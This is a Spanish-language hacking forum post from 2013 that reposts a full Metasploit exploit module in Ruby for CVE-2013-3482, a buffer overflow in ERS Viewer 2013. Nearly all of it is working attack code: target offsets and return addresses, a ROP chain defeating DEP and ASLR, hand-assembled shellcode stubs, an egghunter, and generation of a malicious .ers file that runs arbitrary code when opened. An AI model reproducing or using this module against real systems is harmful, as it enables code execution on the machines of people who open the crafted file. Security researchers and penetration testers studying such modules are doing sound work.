send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

ERS Viewer 2013 ERS File Handling Buffer Overflow

  • 0 Respuestas
  • 1330 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 127
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Julio 09, 2013, 05:47:36 pm »
===========================================
Date add:   2013-07-09
Category:   local exploits
Verified:   VerifiedVerified
Risk:   <font color="#FFBF00">Security Risk High</font>
Platform:   windows
===========================================

Código: Ruby
  1. require 'msf/core'
  2.  
  3. class Metasploit3 < Msf::Exploit::Remote
  4.   Rank = NormalRanking
  5.  
  6.   include Msf::Exploit::FILEFORMAT
  7.   include Msf::Exploit::Remote::Egghunter
  8.  
  9.   def initialize(info={})
  10.     super(update_info(info,
  11.       'Name'           => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
  12.       'Description'    => %q{
  13.           This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
  14.         The vulnerability exists in the module ermapper_u.dll, where the function
  15.         rf_report_error handles user provided data in a insecure way. It results in
  16.         arbitrary code execution under the context of the user viewing a specially crafted
  17.         .ers file. This module has been tested successfully with ERS Viewer 2013 (versions
  18.         13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
  19.       },
  20.       'License'        => MSF_LICENSE,
  21.       'Author'         =>
  22.         [
  23.           'James Fitts', # Vulnerability Discovery
  24.           'juan vazquez' # Metasploit
  25.         ],
  26.       'References'     =>
  27.         [
  28.           [ 'CVE', '2013-3482' ],
  29.           [ 'OSVDB', '93650' ],
  30.           [ 'URL', 'http://secunia.com/advisories/53620/' ]
  31.         ],
  32.       'Payload'        =>
  33.         {
  34.           'Space'    => 4000,
  35.           'DisableNops' => true,
  36.         },
  37.       'DefaultOptions'  =>
  38.         {
  39.           'ExitFunction' => "process",
  40.         },
  41.       'Platform'       => 'win',
  42.       'Targets'        =>
  43.         [
  44.           # Tested on Windows XP SP3
  45.           [ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
  46.             {
  47.               'Offset' => 191,
  48.               'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
  49.             }
  50.           ],
  51.           # Tested on Windows XP SP3 and Windows 7 SP1
  52.           [ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
  53.             {
  54.               'Offset' => 191,
  55.               'Ret' => 0x100E1152,     # xchg eax, esp # ret # from ermapper_u.dll
  56.               'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
  57.               'VirtualAllocPtr' => 0x1010c0f4
  58.             }
  59.           ]
  60.         ],
  61.       'Privileged'     => false,
  62.       'DisclosureDate' => "May 23 2013",
  63.       'DefaultTarget'  => 1))
  64.  
  65.     register_options(
  66.       [
  67.         OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
  68.       ], self.class)
  69.  
  70.   end
  71.  
  72.   def create_rop_chain()
  73.     # rop chain generated with mona.py - www.corelan.be
  74.     rop_gadgets =
  75.       [
  76.         0x10082624,    # POP EAX # RETN [ermapper_u.dll]
  77.         0x1010c0f4,    # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
  78.         0x1001a9c0,    # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
  79.         0x1005db36,    # XCHG EAX,ESI # RETN [ermapper_u.dll]
  80.         0x10105d87,    # POP EBX # RETN [ermapper_u.dll]
  81.         0xffffffff,    #
  82.         0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
  83.         0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
  84.         0x100e9dd9,    # POP EAX # RETN [ermapper_u.dll]
  85.         0xa2dbcf75,    # put delta into eax (-> put 0x00001000 into edx)
  86.         0x1001aa04,    # ADD EAX,5D24408B # RETN [ermapper_u.dll]
  87.         0x10016a98,    # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
  88.         0x10086d21,    # RETN (ROP NOP) [ermapper_u.dll]
  89.         0x1001a148,    # & push esp # ret  [ermapper_u.dll]
  90.         0x10082624,    # POP EAX # RETN [ermapper_u.dll]
  91.         0xffffffc0,    # Value to negate, will become 0x00000040
  92.         0x100f687d,    # NEG EAX # RETN [ermapper_u.dll]
  93.         0x1001e720,    # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
  94.         0x100288b5,    # POP EAX # RETN [ermapper_u.dll]
  95.         0x90909090,    # nop
  96.         0x100e69e0,    # PUSHAD # RETN [ermapper_u.dll]
  97.       ].flatten.pack("V*")
  98.  
  99.     return rop_gadgets
  100.   end
  101.  
  102.   # Restore the stack pointer in order to execute the final payload successfully
  103.   def fix_stack
  104.     pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18] # get teb
  105.     pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
  106.     pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
  107.     pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
  108.     return pivot
  109.   end
  110.  
  111.   # In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
  112.   # the payload on memory we can't jump there directly, but allocate executable memory
  113.   # and jump there. Badchars: "\x0a\x0d\x00"
  114.   def hunter_suffix(payload_length)
  115.     # push flProtect (0x40)
  116.     suffix = "\xB8\xC0\xFF\xFF\xFF"                              # mov eax, 0xffffffc0
  117.     suffix << "\xF7\xD8"                                         # neg eax
  118.     suffix << "\x50"                                             # push eax
  119.     # push flAllocationType (0x3000)
  120.     suffix << "\x66\x05\xC0\x2F"                                 # add ax, 0x2fc0
  121.     suffix << "\x50"                                             # push eax
  122.     # push dwSize (0x1000)
  123.     suffix << "\x66\x2D\xFF\x1F"                                 # sub ax, 0x1fff
  124.     suffix << "\x48"                                             # dec eax
  125.     suffix << "\x50"                                             # push eax
  126.     # push lpAddress
  127.     suffix << "\xB8\x0C\x0C\x0C\x0C"                             # mov eax, 0x0c0c0c0c
  128.     suffix << "\x50" # push eax
  129.     # Call VirtualAlloc
  130.     suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
  131.     # Copy payload (edi) to Allocated memory (eax)
  132.     suffix << "\x89\xFE"                                         # mov esi, edi
  133.     suffix << "\x89\xC7"                                         # mov edi, eax
  134.     suffix << "\x31\xC9"                                         # xor ecx, ecx
  135.     suffix << "\x66\x81\xC1" + [payload_length].pack("v")        # add cx, payload_length
  136.     suffix << "\xF3\xA4"                                         # rep movsb
  137.     # Jmp to the final payload (eax)
  138.     suffix << "\xFF\xE0"                                         # jmp eax
  139.  
  140.     return suffix
  141.   end
  142.  
  143.   def exploit
  144.  
  145.     #These badchars do not apply to the final payload
  146.     badchars = [0x0c, 0x0d, 0x0a].pack("C*")
  147.  
  148.     eggoptions =
  149.       {
  150.         :checksum => true,
  151.         :eggtag => 'w00t'
  152.       }
  153.     my_payload = fix_stack + payload.encoded
  154.  
  155.     if target.name =~ /DEP & ASLR bypass/
  156.       # The payload length can't include NULL's in order to
  157.       # build the stub which will copy the final payload to
  158.       # executable memory
  159.       while [my_payload.length].pack("v").include?("\x00")
  160.         my_payload << rand_text(1)
  161.       end
  162.     end
  163.  
  164.     hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)
  165.  
  166.     if target.name =~ /DEP & ASLR bypass/
  167.       hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))
  168.     end
  169.  
  170.     if target.name =~ /NO DEP/
  171.       buf = rand_text_alpha(1)
  172.       buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
  173.       buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
  174.       buf << hunter
  175.       buf << rand_text_alpha(target['Offset'] - buf.length)
  176.       buf << [target.ret].pack("V") # jmp eax
  177.       buf << rand_text_alpha(8)
  178.       buf << egg
  179.     elsif target.name =~ /DEP & ASLR bypass/
  180.       buf = rand_text_alpha(1)
  181.       buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
  182.       buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
  183.       buf << create_rop_chain
  184.       buf << hunter
  185.       buf << rand_text_alpha(target['Offset'] - buf.length)
  186.       buf << [target.ret].pack("V") # xchg eax, esp # ret
  187.       buf << rand_text_alpha(8)
  188.       buf << egg
  189.     end
  190.  
  191.     ers = %Q|
  192. DatasetHeader Begin
  193. #{buf} End
  194.     |
  195.  
  196.     file_create(ers)
  197.   end
  198. end
  199.  
« Última modificación: Julio 09, 2013, 06:56:25 pm por Snifer »
You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC

Iniciado por hielasangre

Respuestas: 0
Vistas: 1619
Último mensaje Agosto 27, 2011, 05:33:54 pm
por hielasangre
Remote FIle Inclusion para Novatos

Iniciado por alexander1712

Respuestas: 15
Vistas: 5240
Último mensaje Noviembre 30, 2012, 04:12:50 pm
por hdbreaker
[Tutorial]Local File Include (LFI)

Iniciado por arthusu

Respuestas: 8
Vistas: 6192
Último mensaje Marzo 05, 2013, 01:44:55 am
por arthusu
Remote File Downloading (RFD) En MySQL

Iniciado por M5f3r0

Respuestas: 5
Vistas: 2551
Último mensaje Noviembre 06, 2013, 12:17:18 pm
por M5f3r0
Joomla JCE Remote File Upload

Iniciado por k43l

Respuestas: 2
Vistas: 2084
Último mensaje Octubre 30, 2013, 12:28:04 pm
por jul14n4